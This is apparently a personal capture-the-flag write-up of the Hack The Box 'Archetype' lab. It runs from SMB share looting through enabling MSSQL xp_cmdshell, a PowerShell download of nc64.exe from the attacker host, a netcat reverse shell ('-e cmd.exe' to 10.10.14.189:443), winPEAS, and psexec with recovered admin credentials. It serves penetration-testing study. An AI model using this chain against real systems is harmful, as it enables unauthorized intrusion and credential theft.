---
date: 2024-10-08T18:56
tags:
  - HTB
  - MSSQL
  - cybersecurity
  - SMB
  - RemoteCodeExecution
  - Powershell
cssclasses:
  - pen-green
  - page-grid
---
#### Instruments and terminology
***
**SMB (Server Message Block)** - protocol used to share files, printers serial ports and miscellaneous communications between node on local network

**Privilege Escalation** - is when a threat actor gains elevated access and administrative rights to a system by exploiting security vulnerabilities. 

**winPEAS** - tool used for looking for Windows local privilege escalation vectors

**Network shares** - also known as `shared resourse` is a computer resource made available from one host to other hosts on a computer network 

**impacet** - collection of python classes for working with network protocols. `Impacket` is focused o providing low-level programmatic access to the packets and for some protocols (SMB1-3 and MSRPC) the protocol implementation itself
  `psexec.py` - is a script that enables the remote execution of commands of Windows machines
  `mssqlclient.py` - command line script for interacting with Microsoft SQL Server. It allows you to execute SQL queries, upload and download files and perform other actions on a SQL Server instance.

**smbclient** - 
#### Used materials
***
- [nc64.exe](https://github.com/int0x33/nc.exe/blob/master/nc64.exe?source=post_page-----a2ddc3557403----------------------)
- [winPEASx64.exe](https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe)
- [MSSQL Injection Cheat Sheet](https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
#### Steps
***
```bash
nmap -sC -sV 10.129.95.187
```

As a result of nmap we have next ports open:
- port 135 - `msrpc`
- port 139 - `netbios-ssn`
- port 445 - `microsoft-ds`
- port 1433 `ms-sql-s`

Since `microsoft-ds` is an SMB, we can use `smbclient` to get network shares

```bash
smbclient -L \\\\10.129.95.187\\
```

As the result we got next network shares
- ADMIN$
- backups
- C$
- IPC$

Lets try to open “backups“ share using `smbclient`

```bash
smbclient \\\\10.129.95.187\\backups
```

We entered the “backups“ share. Here we have `prod.dtsConfig` file that we can download

```bash
get prod.dtsConfig
```

Inside this file, we can see the next line
```xml
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
```

Those are credential for a MS Server database. Now we can connect to it using `impacket` script called `mssqlclient`
```bash
impacket-mssqlclient ARCHETYPE/sql_svc:M3g4c0rp123@10.129.95.187 -windows-auth
```

Now, we are connected to MS Server. Now we can try to navigate the OS directories to find something useful. 

Now lets see what users this system has
```bash
EXEC xp_cmdshell "net users"
```

We get an error saying that `sys.xp_cmdshell` is off as part of the security configuration. But we can turn it back on. 

For this purpose we’ll use MSSQL Injection Cheat Sheet from materials 
```bash
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
```

Now `EXEC xp_cmdshell` will return list of users:
- `Administrator`
- `sql_svc`
- `DefaultAccount`
- `Guest`
- `WDAUtilityAccount`

Now lets try to install reverse shell to gain access over the server. For this purpose we will run `netcat` on port `443` and `http server` on port 80

```bash
#running netcat
sudo nc -lnvp 443
```

```bash
#starting http server
sudo python3 -m http.server 80
```

Now we should download `nc64.exe` file from materials and send it on the attacked machine

For that we should execute new `powershell` commands
```bash
EXEC xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.189/nc64.exe -outfile nc64.exe";

EXEC xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.189 443";
```

To be clear, if first step we upload `nc64.exe` on the machine through our `http server` on port 80. Then we execute the `nc64.exe`. 

`-e` flag used to execute `cmd.exe` on established connection. 
`10.10.14.9 443` is an address of attacker machine

Now in tab where we run `netcat`, we can navigate through directories
```bash
cd ..
cd Downloads
cat user.txt
```

The `user.txt` file will store the flag.

Now we need to get flag of `administrator`. For that we’ll use tool called `winPEAS`.

```cmd
powershell
.\winPEASx63.exe
```

As a result, `winPEASE` will point a file that can contain some useful information. We can navigate to it and read
```powershell
cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
type ConsoleHost_history.txt
```

Here is a file content:
```
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
```

Now we will use `impacket` `psexec` to access machine via administrator credentials
```bash
impakcet psexec administrator:MEGACORP_4dm1n\!\!@10.129.95.187
```

